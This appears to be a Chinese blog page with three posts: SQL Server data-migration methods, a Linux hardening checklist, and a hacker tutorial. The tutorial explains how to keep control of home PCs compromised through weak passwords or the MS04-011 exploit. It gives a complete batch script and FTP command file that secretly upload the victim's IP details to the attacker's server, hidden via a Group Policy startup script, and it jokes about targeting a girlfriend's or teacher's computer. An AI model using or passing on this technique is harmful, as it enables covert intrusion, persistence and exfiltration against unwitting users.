2006年02月25日

1. 通过工具DTS的设计器进行导入或导出
  DTS的设计器功能强大,支持多任务,也是可视化界面,容易操作,但知道的人一般不多,如果只是进行SQL Server数据库中部分表的移动,用这种方法最好,当然,也可以进行全部表的移动。在SQL Server Enterprise Manager中,展开服务器左边的+,选择数据库,右击,选择All tasks/Import Data…(或All tasks/Export Data…),进入向导模式,按提示一步一步走就行了,里面分得很细,可以灵活的在不同数据源之间复制数据,很方便的。而且可以另存成DTS包,如果以后还有相同的复制任务,直接运行DTS包就行,省时省力。也可以直接打开DTS设计器,方法是展开服务器名称下面的Data Transformation Services,选Local Packages,在右边的窗口中右击,选New Package,就打开了DTS设计器。值得注意的是:如果源数据库要拷贝的表有外键,注意移动的顺序,有时要分批移动,否则外键主键,索引可能丢失,移动的时候选项旁边的提示说的很明白,或者一次性的复制到目标数据库中,再重新建立外键,主键,索引。
  其实建立数据库时,建立外键,主键,索引的文件应该和建表文件分开,而且用的数据文件也分开,并分别放在不同的驱动器上,有利于数据库的优化。
  2. 利用Bcp工具
  这种工具虽然在SQL Server7的版本中不推荐使用,但许多数据库管理员仍很喜欢用它,尤其是用过SQL Server早期版本的人。Bcp有局限性,首先它的界面不是图形化的,其次它只是在SQL Server的表(视图)与文本文件之间进行复制,但它的优点是性能好,开销小,占用内存少,速度快。有兴趣的朋友可以查参考手册。
  3. 利用备份和恢复
  先对源数据库进行完全备份,备份到一个设备(device)上,然后把备份文件复制到目的服务器上(恢复的速度快),进行数据库的恢复操作,在恢复的数据库名中填上源数据库的名字(名字必须相同),选择强制型恢复(可以覆盖以前数据库的选项),在选择从设备中进行恢复,浏览时选中备份的文件就行了。这种方法可以完全恢复数据库,包括外键,主键,索引。
  4. 直接拷贝数据文件
  把数据库的数据文件(*.mdf)和日志文件(*.ldf)都拷贝到目的服务器,在SQL Server Query Analyzer中用语句进行恢复:
  EXEC sp_attach_db @dbname = ’test’,
  @filename1 = ’d:mssql7data est_data.mdf’,
  @filename2 = ’d:mssql7data est_log.ldf’
  这样就把test数据库附加到SQL Server中,可以照常使用。如果不想用原来的日志文件,可以用如下的命令:
  EXEC sp_detach_db @dbname = ’test’
  EXEC sp_attach_single_file_db @dbname = ’test’,
  @physname = ’d:mssql7data est_data.mdf’
  这个语句的作用是仅仅加载数据文件,日志文件可以由SQL Server数据库自动添加,但是原来的日志文件中记录的数据就丢失了。
  
  5. 在应用程序中定制
  可以在应用程序(PB、VB)中执行自己编写的程序,也可以在Query Analyzer中执行,这种方法比较灵活,其实是利用一个平台连接到数据库,在平台中用的主要时SQL语句,这种方法对数据库的影响小,但是如果用到远程链接服务器,要求网络之间的传输性能好,一般有两种语句:
1> select … into new_tablename where …
2> insert (into) old_tablename select … from … where …
区别是前者把数据插入一个新表(先建立表,再插入数据),后者是把数据插入已经存在的一个表中,我个人喜欢后者,因为在编程的结构上,应用的范围上,第二条语句强于前者。
  6. SQL Server的复制功能
  SQL Server提供了强大的数据复制功能,也是最不易掌握的,具体应用请参考相关资料,值得注意的是要想成功进行数据的复制工作,有些条件是必不可少的:
  1>SQL Server Agent必须启动,MSDTC必须启动。
  2>所有要复制的表必须有主键。
  3>如果表中有text或image数据类型,必须使用with log选项,不能使用with no_log选项。
  另外max text repl size选项控制可以复制的文本和图像数据的最大规模,超过这个限制的操作将失败。
  4>在要进行复制的计算机上,应该至少是隐含共享,即共享名是C$或D$…。
  5>为SQL Server代理使用的Windows NT帐号不能是一个本地的系统帐号,因为本地的系统帐号不允许网络存取。
  6>如果参与复制的服务器在另外的计算机域中,必须在这些域之间建立信任关系。本人从事的工作是数据库管理员,要维护多台服务器中的数据库,经常把某台服务器中的某个数据库移动到另外一台服务器,对数据的移动有些心得体会,希望和大家共同交流。

网站推荐:去哪儿旅游搜索引擎http://www.qunar.com/

2006年02月15日

§关于分区:

一个潜在的黑客如果要攻击你的Linux  服务器,他首先就会尝试缓冲区溢出。在过去的几年中,以缓冲区溢出为类型的安全漏洞是最为常见的一种形式了。更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以轻易使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!

为了防止此类攻击,我们从安装系统时就应该注意。如果用root分区纪录数据,如log  文件和email  ,就可能因为拒绝服务产生大量日志或垃圾邮件,从而导致系统崩溃。所以建议为/var开辟单独的分区,用来存放日志和邮件,以避免root分区被溢出。最好为特殊的应用程序单独开一个分区,特别是可以产生大量日志的程序,还有建议为/home  单独分一个区,这样他们就不能填满/  分区了,从而就避免了部分针对Linux  分区溢出的恶意攻击。

§关于BIOS:

记着要在BIOS设置中设定一个BIOS密码,不接收软盘启动。这样可以阻止不怀好意的人用专门的启动盘启动你的Linux  系统,并避免别人更改BIOS设置,如更改软盘启动设置或不弹出密码框直接启动服务器等等。

§关于口令:

口令是系统中认证用户的主要手段,系统安装时默认的口令最小长度通常为5  ,但为保证口令不易被猜测攻击,可增加口令的最小长度,至少等于8.为此,需修改文件/etc/login.defs  中参数PASS_MIN_LEN(口令最小长度)。同时应限制口令使用时间,保证定期更换口令,建议修改参数PASS_MIN_DAYS  (口令使用时间)。

§关于Ping:

既然没有人能ping通你的机器并收到响应,你可以大大增强你的站点的安全性。你可以加下面的一行命令到/etc/rc.d/rc.local,以使每次启动后自动运行,这样就可以阻止你的系统响应任何从外部/  内部来的ping请求。

echo  1  >  /proc/sys/net/ipv4/icmp_echo_ignore_all

§关于Telnet:

如果你希望用户用Telnet远程登录到你的服务器时不要显示操作系统和版本信息(可以避免有针对性的漏洞攻击),你应该改写/etc/inetd.conf  中的一行象下面这样:

telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd  -h

加-h标志在最后使得telnet后台不要显示系统信息,而仅仅显示login.

§关于特权账号:

禁止所有默认的被操作系统本身启动的且不需要的帐号,当你第一次装上系统时就应该做此检查,Linux  提供了各种帐号,你可能不需要,如果你不需要这个帐号,就移走它,你有的帐号越多,就越容易受到攻击。

为删除你系统上的用户,用下面的命令:userdel  username

为删除你系统上的组用户帐号,用下面的命令:groupdel  username

在终端上打入下面的命令删掉下面的特权用账号:

userdel  adm  userdel  lp  userdel  sync  userdel  shutdown  userdel  halt  userdel  mail

如果你不用sendmail服务器,就删除这几个帐号:

userdel  news  userdel  uucp  userdel  operator  userdel  games

如果你不用X  windows  服务器,就删掉这个帐号。

userdel  gopher

如果你不允许匿名FTP  ,就删掉这个用户帐号:

userdel  ftp

§关于su命令:

如果你不想任何人能够su为root的话,你应该编辑/etc/pam.d/su  文件,加下面几行:

auth  sufficient  /lib-  /security/pam_rootok-  。so  debug

auth  required  /lib-  /security/pam_wheel-。so  group=isd

这意味着仅仅isd  组的用户可以su作为root.  如果你希望用户admin  能su作为root.  就运行下面的命令:

usermod  -G10  admin

suid程序也是非常危险的,这些程序被普通用户以euid=0(即root)的身份执行,只能有少量程序被设置为suid.  用这个命令列出系统的suid二进制程序:

suneagle#  find  /  -perm  -4000  -print

你可以用chmod  -s去掉一些不需要程序的suid位。

§关于账户注销:

如果系统管理员在离开系统时忘了从root注销,系统应该能够自动从shell  中注销。那么,你就需要设置一个特殊的Linux  变量“tmout  ”,用以设定时间。同样,如果用户离开机器时忘记了注销账户,则可能给系统安全带来隐患。你可以修改/etc/profile文件,保证账户在一段时间没有操作后,自动从系统注销。编辑文件/etc/profile,在“histfilesize=  ”行的下一行增加如下一行:

tmout=600

则所有用户将在10分钟无操作后自动注销。注意:修改了该参数后,必须退出并重新登录root,更改才能生效。

§关于系统文件:

对于系统中的某些关键性文件如passwd、passwd.old、passwd._、shadow、shadown._、inetd.conf、services和lilo.conf  等可修改其属性,防止意外修改和被普通用户查看。如将inetd  文件属性改为600  :

#  chmod  600  /etc/inetd.conf

这样就保证文件的属主为root,然后还可以将其设置为不能改变:

#  chattr  +i  /etc/inetd.conf

这样,对该文件的任何改变都将被禁止。你可能要问:那我自己不是也不能修改了?当然,我们可以设置成只有root重新设置复位标志后才能进行修改:

#  chattr  -i  /etc/inetd.conf

§关于用户资源:

对你的系统上所有的用户设置资源限制可以防止DoS  类型攻击,如最大进程数,内存数量等。例如,对所有用户的限制,编辑/etc/security/limits.con加入以下几行:

*  hard  core  0  *  hard  rss  5000  *  hard  nproc  20

你也必须编辑/etc/pam.d/login文件,检查这一行的存在:

session  required  /lib/security/pam_limits.so

上面的命令禁止core  files“core  0”,限制进程数为“nproc  50”,且限制内存使用为5M“rss  5000”。

§关于NFS  服务器:

由于NFS  服务器漏洞比较多,你一定要小心。如果要使用NFS  网络文件系统服务,那么确保你的/etc/exports具有最严格的存取权限设置,不意味着不要使用任何通配符,不允许root写权限,mount  成只读文件系统。你可以编辑文件/etc/exports并且加:

/dir/to/export  host1.mydomain.com  (ro,root_squash  )

/dir/to/export  host2.mydomain.com  (ro,root_squash  )

其中/dir/to/export是你想输出的目录,host.mydomain.com  是登录这个目录的机器名,ro意味着mount  成只读系统,root_squash  禁止root写入该目录。最后为了让上面的改变生效,还要运行/usr/sbin/exportfs  -a

§关于开启的服务:

默认的linux  就是一个强大的系统,运行了很多的服务。但有许多服务是不需要的,很容易引起安全风险。这个文件就是/etc/inetd.conf  ,它制定了/usr/sbin/inetd将要监听的服务,你可能只需要其中的两个:telnet和ftp  ,其它的类如shell  ,  login  ,  exec  ,  talk  ,  ntalk,  imap  ,  pop-2,  pop-3,  finger  ,  auth  ,  etc.除非你真的想用它。否则统统关闭之。

你先用下面的命令显示没有被注释掉的服务:

grep  -v  "#"  /etc/inetd.conf

这个命令统计面前服务的总数:

ps  -eaf|wc  -l

需要提醒你的是以下三个服务漏洞很多,强烈建议你关闭它们:S34yppasswdd(NIS  服务器)、S35ypserv  (NIS  服务器)和S60nfs(NFS  服务器)。

我们可以运行#killall  -HUP  inetd  来关闭不需要的服务。当然,你也可以运行

#chattr  +i  /etc/inetd.conf

如果你想使inetd.conf文件具有不可更改属性,而只有root才能解开,敲以下命令

#chattr  -i  /etc/inetd.conf

当你关闭一些服务以后,重新运行以上命令看看少了多少服务。运行的服务越少,系统自然越安全了。我们可以用下面命令察看哪些服务在运行:

netstat  -na  ip

如果你用的是Redhat那就方便多了。^_^  Redhat提供一个工具来帮助你关闭服务,输入/usr/sbin/setup  ,然后选择"system  services"  ,就可以定制系统启动时跑哪些服务。另外一个选择是chkconfig  命令,很多linux  版本的系统都自带这个工具。脚本名字中的数字是启动的顺序,以大写的K  开头的是杀死进程用的。

§关于日志:

所有的日志都在/var/log下(仅对linux  系统而言),默认情况下linux  的日志就已经很强大了,但除ftp  外。因此我们可以通过修改/etc/ftpaccess或者/etc/inetd.conf,来保证每一个ftp  连接日志都能够纪录下来。下面是一个修改inetd.conf的例子,假如有下一行:

ftp  stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd  -l  -L  -i  -o

注释:-l每一个ftp  连接都写到syslog  -L  纪录用户的每一个命令-i文件received,纪录到xferlog  -o文件transmitted  ,记录到xferlog

不过你也不要太相信日志,因为绝大部分黑客都有“擦脚印”的“好”习惯啰!如果你不放心,最好安装一个Sniffer  吧。

§关于TCP_WRAPPERS:

默认的,Redhat  Linux允许所有的请求,这是很危险的。如果用TCP_WRAPPERS来增强我们站点的安全性简直是举手之劳,你可以将禁止所有的请求放入“ALL  :  ALL  ”到/etc/hosts.deny  中,然后放那些明确允许的请求到/etc/hosts.allow中,如:

sshd:  192.168.1.10/255.255.255.0  gate.openarch.com

对IP地址192.168.1.10和主机名gate.openarch.com  ,允许通过ssh  连接。配置完了之后,用tcpdchk  检查,你可以直接执行:tcpdchk.在这里,tcpchk是TCP_Wrapper配置检查工具,它检查你的tcp  wrapper  配置并报告所有发现的潜在/  存在的问题。

§关于补丁:

你应该经常到你所安装的Linux  系统发行商的主页上去找最新的补丁。例如:对于Redhat系统而言可以在:http://www.redhat.com/corp/support/errata/上找到补丁。幸运的是,在Redhat6.1  以后的版本带有一个自动升级工具up2date  ,它能自动够测定哪些rpm  包需要升级,然后自动从Redhat的站点下载并完成安装。这对某些懒惰的管理员来说,可是个省精神的福音哦!

网站推荐:去哪儿旅游搜索引擎http://www.qunar.com/twell/longwell?locale=zh

By  剑心[B.C.T]

记得N久前的月黑风高的晚上,正是弱口令泛滥成灾的时候,作为菜鸟的我的一大爱好就是拿着x-scan2.3扫描弱口令,因为一些个人上网的用户对安全一点都不重视,默认安装的弱口令到处都是,那时真是爽啊~~怀念ING!
暂且不说经典的弱口令入侵了,那个相信大家都会。当时我难以解决的一个问题就是这些肉鸡只要一重起重新连接的话,ip每次都会变化的,菜鸟的我不会用反向的木马,一见加壳头就大,偏偏杀毒软件超级BT,又不会编程,那感觉简直就像看着上钩的鱼儿游回大海,那个郁闷啊~~~后来终于让我找到一种用脚本牢牢抓住肉鸡ip的方法,注意这些都是正常的脚本,不会被杀毒软件发现的哦,隐蔽而安全,让你十分想要的又是动态ip的肉鸡难逃五指山(譬如你女朋友或者老师的电脑~~)。
废话不多说了,我们就一起来看看如何用脚本栓住肉鸡吧!首先,我们知道因为我们的肉鸡很特殊,不是长时间在线,我们不过是因为一些特别的原因而想要长期控制他,但是因为安全的原因不想用木马。我们的问题是肉鸡上线后如何在想得到他的ip的时候可以快速得到他的ip,(假设你已经开启了肉鸡的telnet或者其他的后门,只要知道ip就可以登陆)。这里,我用的方法是ftp,我也曾经想过用http的方法,但是实现的难度大点就不考虑了。这里,首先看这几个命令:

ipconfig  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
time  /t  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
date  /t  >C:\WINNT\system32\config\config.txt

相信大家一看就明白,这样就可以把我们想要的信息ip和上线日期写入文件了,你也可以改进下,变的美观并且直接些,譬如echo写上肉鸡的名字,这样就好分辨了,留给有创意的朋友去发挥了!。
这样将信息写如文件后的一个问题是如何将这信息写到某个我们可以读取的地方。曾想过用nc通过http提交,但是由于文件的大小及http协议的原因没有实验,有朋友有兴趣的话可以试试。这里我用的一个是ftp的-s参数:

ftp  -n  -s:"c:\WINNT\system32\system.ftp"

-s:后是ftp命令的脚本,其中system.ftp的内容如下:

open  127.0.0.1  8888
user  jnc
123
prompt
mput  c:\WINNT\system\config\config.txt
bye

首先打开一个公网ip的ftp(可以是你的某个肉鸡,甚至是更新的域名。),这里是我自己的ftp,端口为8888,然后输入用户名密码,各做一行,接着是上传我们写好的配置文件到一个目录下,如果是你的网页目录的话,当我们的配置文件上传后就可以通过http://jnc.xxx.com/ipconfig.txt直接读取了。
哈哈,文件上传的问题解决了,在肉鸡方面什么时候执行这样的写文件并且执行上传文件的操作呢?要知道个人用户这类肉鸡不是像服务器样时刻都在线的,他们在线的时间不一定,我们如何才可以在他们上线了的时候才执行上面的操作呢?这里我用的是批处理的循环操作,命令如下:

ping  www.163.com|find  "Reply  from"
if  %ERRORLEVEL%==0  goto  ok
if  %ERRORLEVEL%==1  goto  end
:o k
ipconfig  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
time  /t  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
date  /t  >C:\WINNT\system32\config\config.txt
ftp  -n  -s:"c:\WINNT\system32\system.ftp"
exit
:end
ping  www.163.com|find  "Reply  from"
if  %ERRORLEVEL%==0  goto  ok
if  %ERRORLEVEL%==1  goto  end
或者

ping  www.163.com|find  "Reply  from"&&goto  ok
goto  end
:o k
ipconfig  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
time  /t  >>C:\WINNT\system32\config\config.txt
echo.>>C:\WINNT\system32\config\config.txt
date  /t  >C:\WINNT\system32\config\config.txt
ftp  -n  -s:"c:\WINNT\system32\system.ftp"
exit
:end
ping  www.163.com|find  "Reply  from"&&goto  ok
goto  end
嘿嘿,首先ping网易的域名在结果中如果得到有数据包返回的信息即返回  %ERRORLEVEL%==0  说明用户上线,够毒吧!这时马上将肉鸡信息写入文件并且上传,如果ping不通就执行循环直到网络接通。
这样的话,所要执行的文件就写出来了,现在的问题是如何将执行文件的整个过程变的隐蔽,开始我想的是将这个批处理文件写到启动栏里,但是启动的时候黑黑的界面太危险,而且有循环的,人家不怀疑才怪呢!更糟的是不小心还会遗失自己的ftp密码。经过一段时间的搜索发现将脚本写入到组策略的启动脚本里就没有任何提示了!而且启动脚本比较隐蔽,一般个人用户都不会注意到这个地方,并且也很容易实现。我们分析启动脚本的配置文件C:\WINNT\system32\GroupPolicy\Machine\Scripts\scripts.ini,注意这个文件当配置启动脚本时才会出现,并且有系统隐藏属性。文件如下:

[Startup]
0CmdLine=E:\test\run.vbe
0Parameters=
首先空一行,然后是脚本的类型,这里是启动脚本[Startup],(当然不要关机脚本了,汗!)下面是配置脚本了,数字0代表第一个脚本,CmdLine后面是脚本的位置,Parameters是参数,这里就不需要了。
好,配置好的scripts.ini如下

[Startup]
0CmdLine=c:\winnt\system32\system.bat
0Parameters=
上述文件写入system32文件夹的原因是为了隐蔽,到这里,我们需要解决的问题都一一解决,为了方便,将一切都交给批处理吧,这样在shell里就会很好的实现了。
让我们来实验下吧!先得到一个肉鸡的shell吧!(扫描个人上网用户的ip段好象满地都是这东西~),空口令没有了,我们就来ms04011吧!嘿嘿~得到shell如图1!
想要留住的话就用这个脚本试试,首先写system.ftp文件,最后用echo写system.bat文件,写启动脚本如图二。嘿嘿,小样,你还跑得了?等他重起后访问我网站的config.txt得到他的ip,哈哈,就不抓图了。

网站推荐:去哪儿旅游搜索引擎http://www.qunar.com/twell/longwell?locale=zh